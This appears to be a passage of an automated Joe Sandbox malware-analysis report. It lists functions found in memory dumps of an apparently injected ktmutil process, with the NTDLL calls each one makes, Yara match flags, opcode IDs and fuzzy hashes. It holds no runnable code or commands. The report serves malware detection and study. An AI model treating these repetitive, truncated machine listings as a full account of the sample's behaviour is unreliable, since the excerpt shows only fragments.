                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 2df1d9b015474010a9667e1f48030d82b39e4b8a0229bf0c848740eb48d4f5bc
                                                                          • Instruction ID: 8d46b351448b7f2f8b0beab27cb4e38bf09ceb6c0765efa2c258bb4173aa7f42
                                                                          • Opcode Fuzzy Hash: 2df1d9b015474010a9667e1f48030d82b39e4b8a0229bf0c848740eb48d4f5bc
                                                                          • Instruction Fuzzy Hash: 3131E6B9A00248AFCB14DF98C881EDEB7B9EF8D714F108219F909A7340D770A951CFA5
                                                                          Function 028E9380 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • NtReadFile.NTDLL(?,5F8FFFB0,?,?,?,?,?,?,?), ref: 028E9469
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 5b7998dfa1e579f5c837d53e03e5c1004f1e95ef4df3e0c3105228523c17caee
                                                                          • Instruction ID: 5acfed1b97fe05ebb55f42b19ff9d3b4ed7407580028b775e039a0f15ec5d6d8
                                                                          • Opcode Fuzzy Hash: 5b7998dfa1e579f5c837d53e03e5c1004f1e95ef4df3e0c3105228523c17caee
                                                                          • Instruction Fuzzy Hash: 2B31E9B9A00608AFDB14DF98D881EDFB7B9EF89714F108219FD19A7241D770A911CFA1
                                                                          Function 028E9690 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • NtAllocateVirtualMemory.NTDLL(028D1ECE,5F8FFFB0,028E812F,00000000,00000004,00003000,?,?,?,?,?,028E812F,028D1ECE), ref: 028E9758
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2167126740-0
                                                                          • Opcode ID: 651d02b360af7c7c8688c48c9a1e2283c0a48e8f57f2dad256604bae42aee937
                                                                          • Instruction ID: 468ca725bf637fb04306f9591e2c2d8ca84f0b4d537d4908b12f3263644e632d
                                                                          • Opcode Fuzzy Hash: 651d02b360af7c7c8688c48c9a1e2283c0a48e8f57f2dad256604bae42aee937
                                                                          • Instruction Fuzzy Hash: 372128B9A00208AFDB10DF98CC81EAFB7B9EF89710F108519F909A7240D770A911CFA5
                                                                          Function 028E9530 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 028E9567
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: be0cb4410887f87cacd915793feeba3c97a0129e18297d3ed90cc9ef85f66603
                                                                          • Instruction ID: 727b4b9819502afb5c6c0655fa2747cbb98daa41567b14b7c777f03e943b2519
                                                                          • Opcode Fuzzy Hash: be0cb4410887f87cacd915793feeba3c97a0129e18297d3ed90cc9ef85f66603
                                                                          • Instruction Fuzzy Hash: DEE0463A2002047BC620EA59CC41F9BB76EDBC6724F41841AFA08A7241DB70B9118BB5
                                                                          Function 03374340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 75552b1e07c6e4185d75ac4f8b1edc664b089787957fab9469c1bbcf9c9009c2
                                                                          • Instruction ID: d5a98c191dfdf5d9b8b719079899324961807533472b958f603dc71773dd1e9f
                                                                          • Opcode Fuzzy Hash: 75552b1e07c6e4185d75ac4f8b1edc664b089787957fab9469c1bbcf9c9009c2
                                                                          • Instruction Fuzzy Hash: 45900235615904129140B25C48C4586400697E0301B95C011E0424958C8B188A565361
                                                                          Function 03374650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: d2f45556e3aed779f8c0fdb49f10aaff8d357718a1934262127094667836fe4d
                                                                          • Instruction ID: 920e526539d003c0cc0137c0e6e19b5e381f9a1d999d41ecfaf7162eeaafbdb9
                                                                          • Opcode Fuzzy Hash: d2f45556e3aed779f8c0fdb49f10aaff8d357718a1934262127094667836fe4d
                                                                          • Instruction Fuzzy Hash: ED900265611604424140B25C4884446600697E13013D5C115A0554964C871C89559269
                                                                          Function 03372B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 84cb24ef5bb491da0b795af1c231af124ed6ea05fa300061b8cfca7c7bf262e7
                                                                          • Instruction ID: a8b59e76248eee6336b97430e42376aca4eb86ee89eab12a08214239a48b07cb
                                                                          • Opcode Fuzzy Hash: 84cb24ef5bb491da0b795af1c231af124ed6ea05fa300061b8cfca7c7bf262e7
                                                                          • Instruction Fuzzy Hash: EE900265212504034105B25C4494656400B87E0301B95C021E1014994DC62989916125
                                                                          Function 03372BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 7c78d94eda59afd7e6ae72f6ec2325c92fc6287e61bebe1bb55524158a8eaa7f
                                                                          • Instruction ID: 3dbaf9f47020115a3899ccb3f922645b7c39efb52f6cc337aa480ee7b3a60f73
                                                                          • Opcode Fuzzy Hash: 7c78d94eda59afd7e6ae72f6ec2325c92fc6287e61bebe1bb55524158a8eaa7f
                                                                          • Instruction Fuzzy Hash: 1090023521150C02D180B25C448468A000687D1301FD5C015A0025A58DCB198B5977A1
                                                                          Function 03372BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: b9c7dea80362b86bee4b195baf0a22ba829c54f73b5d726eb18e7d08b501da27
                                                                          • Instruction ID: 28759d1ad1f00871967b723a6d8aa7f244834c3d23a70a0b2bf4773ab304fdc4
                                                                          • Opcode Fuzzy Hash: b9c7dea80362b86bee4b195baf0a22ba829c54f73b5d726eb18e7d08b501da27
                                                                          • Instruction Fuzzy Hash: 6690023521554C42D140B25C4484A86001687D0305F95C011A0064A98D97298E55B661
                                                                          Function 03372AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 0971ac45c2cf5a644ecf2d8f3b31643e0e5329904eea09cdba2114b49527fc0c
                                                                          • Instruction ID: ecc9af775b7d02f0ebac1c8442c9a19bde41bcb3d92467f6a3d46bf4c075c759
                                                                          • Opcode Fuzzy Hash: 0971ac45c2cf5a644ecf2d8f3b31643e0e5329904eea09cdba2114b49527fc0c
                                                                          • Instruction Fuzzy Hash: 3990043D331504030105F75C07C45470047C7D53513D5C031F1015D54CD735CD715131
                                                                          Function 03372F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 6cfd80f994b15bd2d400a64065317a073115ed75a56999bf174c31c35cc777ea
                                                                          • Instruction ID: c232f6374b3205817b6c85eea1fc62475565e59dde1465afa510157b0007ae46
                                                                          • Opcode Fuzzy Hash: 6cfd80f994b15bd2d400a64065317a073115ed75a56999bf174c31c35cc777ea
                                                                          • Instruction Fuzzy Hash: 0290026535150842D100B25C4494B460006C7E1301F95C015E1064958D871DCD526126
                                                                          Function 03372FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 538dbf435d4e3397cd0d13e39e34d7fdbae0ae7803f32cbc7f0556d9e586980e
                                                                          • Instruction ID: 7fdf2f7893274e2b84255799d6b591e803e9289a21dbcaaafb6ae1085fa70585
                                                                          • Opcode Fuzzy Hash: 538dbf435d4e3397cd0d13e39e34d7fdbae0ae7803f32cbc7f0556d9e586980e
                                                                          • Instruction Fuzzy Hash: 69900225611504424140B26C88C49464006ABE1311795C121A0998954D865D89655665
                                                                          Function 03372FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: c468b983ddc87570505cfa76e3ddcaaaf0ee1242d7de74aaabfa0e46b751562e
                                                                          • Instruction ID: bfcb645c586c8abb8bb6c21a126913d347ce247d44cd253be5e392941f5c6944
                                                                          • Opcode Fuzzy Hash: c468b983ddc87570505cfa76e3ddcaaaf0ee1242d7de74aaabfa0e46b751562e
                                                                          • Instruction Fuzzy Hash: DC900225221D0442D200B66C4C94B47000687D0303F95C115A0154958CCA1989615521
                                                                          Function 03372E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 0b80047e42b5555e53492ea825af0c9945a9870a6bc6ab94e41d353735ea308b
                                                                          • Instruction ID: 02bb8330d83defe906d0fe0268033779035ba527b24baf9d8f6199511749f819
                                                                          • Opcode Fuzzy Hash: 0b80047e42b5555e53492ea825af0c9945a9870a6bc6ab94e41d353735ea308b
                                                                          • Instruction Fuzzy Hash: 8690022561150902D101B25C4484656000B87D0341FD5C022A1024959ECB298A92A131
                                                                          Function 03372EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: bb6863bd09aa361c170bf69442498f9104f130609ab591088f968e1845b57bf2
                                                                          • Instruction ID: 1183b121433e8762617837df54845e25fc76af4eda543298f5fb5ecaae061918
                                                                          • Opcode Fuzzy Hash: bb6863bd09aa361c170bf69442498f9104f130609ab591088f968e1845b57bf2
                                                                          • Instruction Fuzzy Hash: 1690026521190803D140B65C4884647000687D0302F95C011A2064959E8B2D8D516135
                                                                          Function 03372D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 8534f6cce264b43cda3b4f4ffcfbfbef16d9b0b99e1907701b24002173666af1
                                                                          • Instruction ID: 411f182374e37e878e8e27d20935c2da90ae32a57e068dd7e3cfd9d9f74c360a
                                                                          • Opcode Fuzzy Hash: 8534f6cce264b43cda3b4f4ffcfbfbef16d9b0b99e1907701b24002173666af1
                                                                          • Instruction Fuzzy Hash: CD90022531150403D140B25C54986464006D7E1301F95D011E0414958CDA1989565222
                                                                          Function 03372D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 8dacbe8baa2cbc1b14b78aaea83bc0e2870c8d416a470fbc9a891d0e263e2750
                                                                          • Instruction ID: 193d43bdb45f40838e855fcba748fd1b12ff78a98a12481ae70b60dccf78ad44
                                                                          • Opcode Fuzzy Hash: 8dacbe8baa2cbc1b14b78aaea83bc0e2870c8d416a470fbc9a891d0e263e2750
                                                                          • Instruction Fuzzy Hash: D690022D22350402D180B25C548864A000687D1302FD5D415A001595CCCA1989695321
                                                                          Function 03372DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: e89b7a712128bb30cfbe3ae392b5c62dbf40aba73e0a8e3fa037a1a78ae3e7e4
                                                                          • Instruction ID: 0d9095a2597327938c26c873e44070ae3e6707a19be42baced3f7cd855470895
                                                                          • Opcode Fuzzy Hash: e89b7a712128bb30cfbe3ae392b5c62dbf40aba73e0a8e3fa037a1a78ae3e7e4
                                                                          • Instruction Fuzzy Hash: 9290023521150813D111B25C4584747000A87D0341FD5C412A042495CD975A8A52A121
                                                                          Function 03372DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 2dd1c571381729c243c4b61e0c2a7086b7eeabd2242ce915849b81fbf0cd6c33
                                                                          • Instruction ID: c769fe14969c3343449081269f9a580f3739669f05d442388da17d85f1d446e4
                                                                          • Opcode Fuzzy Hash: 2dd1c571381729c243c4b61e0c2a7086b7eeabd2242ce915849b81fbf0cd6c33
                                                                          • Instruction Fuzzy Hash: 07900225252545525545F25C4484547400797E03417D5C012A1414D54C862A9956D621
                                                                          Function 03372C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 5990b3cc9bae5a6aa0b6e68740f43dfe4deaecf4e86b7e31d7288fa0c6bb66c7
                                                                          • Instruction ID: ce3d4cfb76f7b273ede5a09dd5045073773c09cc8d3cb6af6ef22905649b6fe6
                                                                          • Opcode Fuzzy Hash: 5990b3cc9bae5a6aa0b6e68740f43dfe4deaecf4e86b7e31d7288fa0c6bb66c7
                                                                          • Instruction Fuzzy Hash: 3990023521158C02D110B25C848478A000687D0301F99C411A4424A5CD879989917121
                                                                          Function 03372C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: c50dc4f1eca9a7bf38fba437ea7005dd29ae283e7b731c70651e9f6a958f4828
                                                                          • Instruction ID: e1642e7ff1da1cd69c9bc8e63f981f7ceb497a26e99b633d4ca2320c79657d2a
                                                                          • Opcode Fuzzy Hash: c50dc4f1eca9a7bf38fba437ea7005dd29ae283e7b731c70651e9f6a958f4828
                                                                          • Instruction Fuzzy Hash: 6D90023521150C42D100B25C4484B86000687E0301F95C016A0124A58D8719C9517521
                                                                          Function 03372CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: b774feb7552b0b072025c6f3e8a385cc4f9a36986d3e9baccf73561a08f35309
                                                                          • Instruction ID: a482f0dfe9d7f362244ffa314bc6d12d10b0572fbb586c0f4d59adc17389ad97
                                                                          • Opcode Fuzzy Hash: b774feb7552b0b072025c6f3e8a385cc4f9a36986d3e9baccf73561a08f35309
                                                                          • Instruction Fuzzy Hash: 2090023521150802D100B69C5488686000687E0301F95D011A5024959EC76989916131
                                                                          Function 033735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 0bbca2025e6bc6f76bcfc8ab3558d20c892d97d600845a5c50ff30d0c5d5daa4
                                                                          • Instruction ID: 917f52dbba1b796bd2681633bed76dd86b4ca3e545f7dbf4bdaadc366336074c
                                                                          • Opcode Fuzzy Hash: 0bbca2025e6bc6f76bcfc8ab3558d20c892d97d600845a5c50ff30d0c5d5daa4
                                                                          • Instruction Fuzzy Hash: 7390023561560802D100B25C4594746100687D0301FA5C411A042496CD87998A5165A2
                                                                          Function 033739B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
